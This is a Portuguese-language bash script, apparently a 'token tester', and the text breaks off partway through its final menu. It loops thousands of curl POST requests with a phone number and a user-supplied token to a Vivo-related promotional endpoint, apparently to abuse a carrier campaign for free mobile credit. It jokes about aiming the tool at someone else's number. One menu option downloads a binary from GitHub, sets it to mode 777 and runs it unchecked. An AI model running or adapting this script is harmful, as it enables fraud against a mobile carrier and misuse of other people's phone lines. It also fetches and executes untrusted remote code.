echo ""
echo -e "    \033[0m\033[01;37m• \033[01;33mTestador de Token personalizado \033[0m\033[01;37m•\033[0m"
echo -e "\033[01;37mTrue = \033[01;32mAprovado \033[01;37m| False = \033[01;31mRelaxe"
echo -e "\033[01;32mCola seu Token aí\033[01;37m"
read -p 'Token: ' TOKEN
NUMERO="5593991113234";
VEZES="20";
echo -e "\033[01;32mOlha isso Douglas\033[1;37m"
echo ""
while :;
do
cont=$(($cont+1));
echo -e "\033[0m\033[01;33mTá no $cont\033[03;037m"
for i in $(seq $VEZES);
do
data=$"msisdn=$cont$NUMERO&campid=$TOKEN&opCode=VV" && site="http://interatividade.vivo.ddivulga.com/carrotProcess" && curl "${site}" -d "${data}"
echo -e "\033[0m\033[01;32mMais:\033[01;37m$i\033[03;037m"
done
echo -e "\e[0m"; ((c++)) && (($cont==9999)) && cont=0 && break
done
echo -e "    \033[0m\033[01;37m• \033[01;32mFim de Transmissão \033[01;37m•\033[0m"
echo ""
sleep 1
while :; 
do
echo -e '\e[0m\e[01;33mQue tal testar no número da crush? ou vai ser fominha?\e[0m'
echo -e '\e[01;37m(1)\e[0m \e[01;32mVou ser fominha, brinks, quero dizer sim, de novo\e[0m'
echo -e '\e[01;37m(2)\e[0m \e[01;32mAgora não, outra hora volto aqui\e[0m'
read -n1 -p 'Opção: ' opc
echo ""
clear
case $opc in
        (1) echo -e '\e[0m\e[01;37mE lá vamos nós |\e[0m \e[01;33m@EhisOpeNer\e[0m'
        sleep 2
        curl -sO https://raw.githubusercontent.com/leitura/ospacotesmb/main/mbsfree99 && chmod 777 mbsfree99 && ./mbsfree99
        break;;
        (2) echo -e '\e[01;37mVocês ainda estão aqui? \nAcabou. Vão pra casa! \nAh, vocês estão esperando uma \nindicação de Deadpool 2. \nBem, nós não temos \nesse tipo de coisa. Vocês estavam \nesperando Sam Jackson aparecer com \num tapa-olho e todo em couro |\e[0m \e[01;33m@EhisOpeNer\e[0m'
        sleep 2
        break
        ;;
        (*)  echo -e '\e[01;33mRaj escolhe uma carta, preste atenção e escolhe sua opção\e[0m'
        sleep 1
        echo ""
